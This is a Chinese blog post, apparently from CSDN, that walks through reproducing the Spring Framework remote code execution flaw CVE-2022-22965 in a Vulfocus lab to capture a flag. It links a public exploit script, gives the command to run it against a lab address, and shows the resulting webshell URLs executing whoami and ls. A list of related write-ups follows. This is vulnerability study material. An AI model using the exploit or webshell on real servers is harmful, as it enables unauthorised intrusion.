Spring Framework远程代码执行漏洞_CVE-2022-22965复现

原创已于 2024-05-13 15:18:37 修改 · 4.2k 阅读

4 ·

CC 4.0 BY-SA版权

文章标签：

#web安全

于 2022-04-07 13:38:15 首次发布

本文介绍了Spring Framework的一个远程代码执行漏洞，该漏洞影响JDK9及以上版本的特定Spring Core和Spring Boot版本。攻击者可以利用此漏洞在受影响的系统上执行恶意代码。复现步骤包括使用Vulfocus靶场、下载开源EXP文件并进行测试，最终获取shell权限并找到flag。建议受影响的用户尽快升级到安全版本。

1. 漏洞介绍

Spring Framework是一个开源应用框架，初衷是为了降低应用程序开发的复杂度，具有分层体系结构，允许用户选择组件，同时还为 J2EE 应用程序开发提供了一个好用的框架。当Spring部署在JDK9及以上版本，远程攻击者可利用该漏洞写入恶意代码导致远程代码执行。

2、受影响版本

Spring Core <= 5.2.19, <= 5.3.17
Spring Boot <= 2.6.5

3、利用前提

JDK 9 及以上版本
Spring框架的5.3.0至5.3.17、5.2.0至5.2.19版本，以及旧版本
Tomcat服务器

4.漏洞复现

1.打开vulfocus靶场环境，输入访问地址进入之后为以下 ok

2，接下来下载github上的开源exp文件

https://github.com/craig/SpringCore0day

3.下载好之后在下载好的文件内打开终端输入以上访问地址来检测

python3 exp.py --url http://123.58.236.76:43269/

4.检测发现漏洞存在并附上url地址访问

漏洞存在，shell地址为:http://123.58.236.76:43269/tomcatwar.jsp?pwd=j&cmd=whoami

5.访问已经是root权限，flag在tmp文件下

6.直接输入文件下tmp位置即可得到flag

http://123.58.236.76:43269/tomcatwar.jsp?pwd=j&cmd=ls%20/tmp

即可通关

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

beichenyyds

关注关注

0
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

CVE-2022-22965 Spring Framework远程代码执行漏洞复现

weixin_45715461的博客

07-11

3999

CVE-2022-22965 Spring Framework远程代码执行漏洞复现

Spring框架Data Binding与JDK 9+导致的远程代码执行漏洞复现

Tauil的博客

07-24

918

该远程代码执行漏洞起因有可能与对SpringCore所做的更改有关，该更改弃用了使用Java序列化和反序列化的旧“异常克隆”函数。该操作导致Java中使用不受信任的字符串值的反序列化运行远程代码。因为需要设置c1、c2、suffix值，所以攻击机中打开burpsiute进行抓包，修改数据包为。，那么我们可以尝试构造特定的类，从而在目标web目录下创建特定文件。sudodockerps//记住你使用8983端口容器ID，记前两位就行。就可以看到我们输入的命令执行成功了。，该页面的页源代码是。......

参与评论您还未登录，请先登录后发表或查看评论

网安渗透测试教程—RCE远程代码执行漏洞详解！零基础小白入门教程建议收藏！

最新发布

2302_76672693的博客

11-24

987

RCE（Remote Code Execution）远程代码执行漏洞(有时也叫命令执行漏洞)是一种安全漏洞，攻击者可以利用它来执行远程代码，从而控制受影响的系统。这种漏洞通常出现在应用程序或软件中，攻击者可以通过输入恶意构造的指令或数据，使得应用程序或软件在执行时执行攻击者指定的代码。RCE的范围比较广，只要渗透的最终结果可以实现执行命令或者代码都属于RCE，例如代码执行、文件包含、反序列化、命令执行，甚至是写文件Getshell都可以属于RCE，通常情况下RCE漏洞都可以归为高危漏洞！

spring framework远程代码执行漏洞复现（CNVD-2022-23942 CVE-2022-22965）

yang1234567898的博客

04-18

7351

3 月 30 日，国家信息安全漏洞共享平台（CNVD）接收到蚂蚁科技集团股份有限公司报送的 Spring 框架远程命令执行漏洞（CNVD-2022-23942）。攻击者利用该漏洞，可在未授权的情况下远程执行命令。CNVD 对该漏洞的综合评级为“高危”。漏洞影响： JDK9+ 使用了 Spring 框架或衍生框架 Apache Tomcat 作为 Servlet 容器 spring-webmvc 或 spring-webflux 依赖 Spring Framework 版本 5.3.0..

spring framework漏洞复现

m0_56135391的博客

04-12

1921

1.在vulfocus平台启动spring framework漏洞环境 2.使用安装有python3环境的机器对该靶场进行漏洞验证，此处使用kali进行攻击，命令为python3 poc文件 -- url 目标地址3.漏洞验证 poc（python文件） #coding:utf-8 import requests import argparse from urllib.parse import urljoin def Exploit(url): headers = {"suffix":"%

CVE-2022-22965：Spring远程代码执行漏洞复现

精品博客,你值得一看~

03-15

5191

由于Spring框架历史漏洞修复代码存在缺陷，在 JDK 9 及以上版本环境下，远程攻击者可借助Tomcat中间件构造数据包修改日志文件，从而可在任意路径下写入Webshell等恶意文件，最终可导致执行任意代码控制服务器等危害。Spring框架（Framework）是一个开源的轻量级J2EE应用程序开发框架，提供了IOC、AOP及MVC等功能，解决了程序人员在开发中遇到的常见问题，提高了应用程序开发便捷度和软件系统构建效率。4.使用 spring-webmvc 或 spring-webflux 的依赖。

Spring Framework 远程代码执行漏洞复现（CVE-2022-22965）

Start C的博客

04-01

5063

1、概述 Spring core是Spring系列产品中用来负责发现、创建并处理bean之间的关系的一个工具包，是一个包含Spring框架基本的核心工具包，Spring其他组件都要使用到这个包。未经身份验证的攻击者可以使用此漏洞进行远程任意代码执行。该漏洞广泛存在于Spring 框架以及衍生的框架中，并JDK 9.0及以上版本会受到影响。 2、受影响版本 Spring Core <= 5.2.19, <= 5.3.17 Spring Boot <= 2.6.5 3、利用前提 JD

Spring Framework远程代码执行漏洞复现(CVE-2022-22965)

Blue的博客

06-22

2280

Spring Framework存在远程代码执行漏洞，在 JDK 9 及以上版本环境下，远程攻击者可利用该漏洞写入恶意代码导致远程代码执行漏洞

Spring Framework远程代码执行漏洞(CVE-2022-22965)

热门推荐

chaojixiaojingang

04-06

1万+

1.漏洞描述由于Spring处理流程存在缺陷，在JDK9及以上版本的Spring框架环境中，远程攻击者可在满足特定条件的基础上，通过框架的参数绑定功能获取AccessLogValve对象并注入恶意字段值，触发pipeline机制，从而在任意路径下写入文件。远程攻击者可利用该漏洞写入恶意代码导致远程代码执行。 2.影响版本 JDK >= 9 & 5.3.X < Spring Framework < 5.3.18 JDK >= 9 & 5.2.X ...

CVE-2022-22965 漏洞复现

Ethan_cfq的博客

04-13

636

执行格式：python3 Spring_vulhub_CVE-2022-22965_poc.py --url=url:pro。此时已将tomcat的日志存储位置已修改为：tomcatwar.jsp，此文件是小马文件，可执行远程命令。拉取cve-2022-22965环境（vulhub拉去环境并打开漏洞环境）在靶场环境搭建可访问的情况下，运行python文件，可直接进行远程命令执行。此时我们可以正常访问页面，说明我们的靶场环境可以使用。访问靶场环境是否可正常访问。此时，手工漏洞已复现结束。

【vulhub系列】CVE-2022-22965 Spring Framework远程代码执行漏洞的复现

Wiofgb的博客

08-12

2214

记录一次CVE-2022-22965 Spring Framework远程代码执行漏洞的复现

Spring Framework远程代码执行漏洞

m0_71745903的博客

01-11

891

2022年3月30日，国家信息安全漏洞共享平台（CNVD）发布了Spring框架远程命令执行漏洞（攻击者利用该漏洞，可在未授权的情况下远程执行命令。目前，此漏洞POC、技术细节及EXP已大范围公开，此漏洞影响范围极大。目前Spring官方已发布补丁修复该漏洞，强烈建议Spring框架用户立即更新至最新版本。

使用Spring Framework构建的应用程序面临严重缺陷

womenjiademao的博客

09-12

416

Spring框架，是用于开发Java Web的应用程序的。最近，其开发人员修补了三个漏洞，其中包括可用于远程代码执行的关键漏洞。 105.png 最严重的缺陷位于spring-messaging模块，它允许应用程序通过内存中的STOMP代理在WebSocket端点上公开STOMP（简单文本导向消息传递协议）。攻击者可以通过向代理发送特制的消息，利用该问题来获取远程代码执行。该漏洞被命名...

CVE-2022-22965漏洞复现

Foreverlove112的博客

10-01

651

CVE-2022-22965漏洞复现

Spring Framework远程代码执行漏洞（CVE-2022-22965）

qq_50854662的博客

06-27

1341

Spring Framework远程代码执行漏洞（CVE-2022-22965）

Spring Framework CVE-2022-22965漏洞详细分析

HBohan的博客

04-18

2266

一. 漏洞利用条件 jdk9+ Spring 及其衍生框架使用tomcat部署spring项目使用了POJO参数绑定 Spring Framework 5.3.X < 5.3.18 、2.X < 5.2.20 或者其他版本二. 漏洞分析一开始复现这个漏洞的时候，听其他师傅说是一个老漏洞CVE-2010-1266的绕过，之前也没调试过这个漏洞，看了些分析文章后，大概明白是对Spring中的bean的漏洞利用，通过API Introspector. getBeanInfo 可以获取到PO

Spring 框架远程代码执行漏洞（CVE-2022-22965）

panda的博客

04-08

5088

Spring 框架远程代码执行漏洞(CVE-2022-22965)

Spring RCE 漏洞 CVE-2022-22965复现分析

m0_61506558的博客

09-19

6266

关于CVE-2022-22965漏洞的环境调试和内容，网上看了一波，感觉有些知识点内容还是必须要了解才能理解该漏洞，为此详细写了下从Spring框架结构分析，环境搭建到漏洞分析调试整体的一个过程理解，在遇到其他类型的漏洞也可以去调试运用。(一）了解Spring框架由于本文主要介绍漏洞原理流程，所以有关框架不会具体展开，会将涉及到的内容进行解释。1、

CVE-2022-22965 Spring Framework远程代码执行漏洞复现

热爱学习，喜欢折腾！

09-14

3360

springframework 是spring 里面的一个基础开源框架，主要用于javaee的企业开发。Spring是什么呢？首先它是一个开源的项目，而且非常活跃；它是一个基于IOC和AOP的构架多层j2ee系统的框架，但它不强迫你必须在每一层中必须使用Spring，因为它模块化的很好，允许你根据自己的需要选择使用它的某一个模块；

Spring4Shell（CVE-2022–22965）复现

11-17

- **漏洞背景与影响范围**：2022年3月31日，Spring官方发布安全公告，披露CVE - 2022–22965 Spring Framework远程代码执行漏洞（即Spring4Shell）。此漏洞暴露了Spring框架在数据绑定与类属性管理上的设计缺陷。...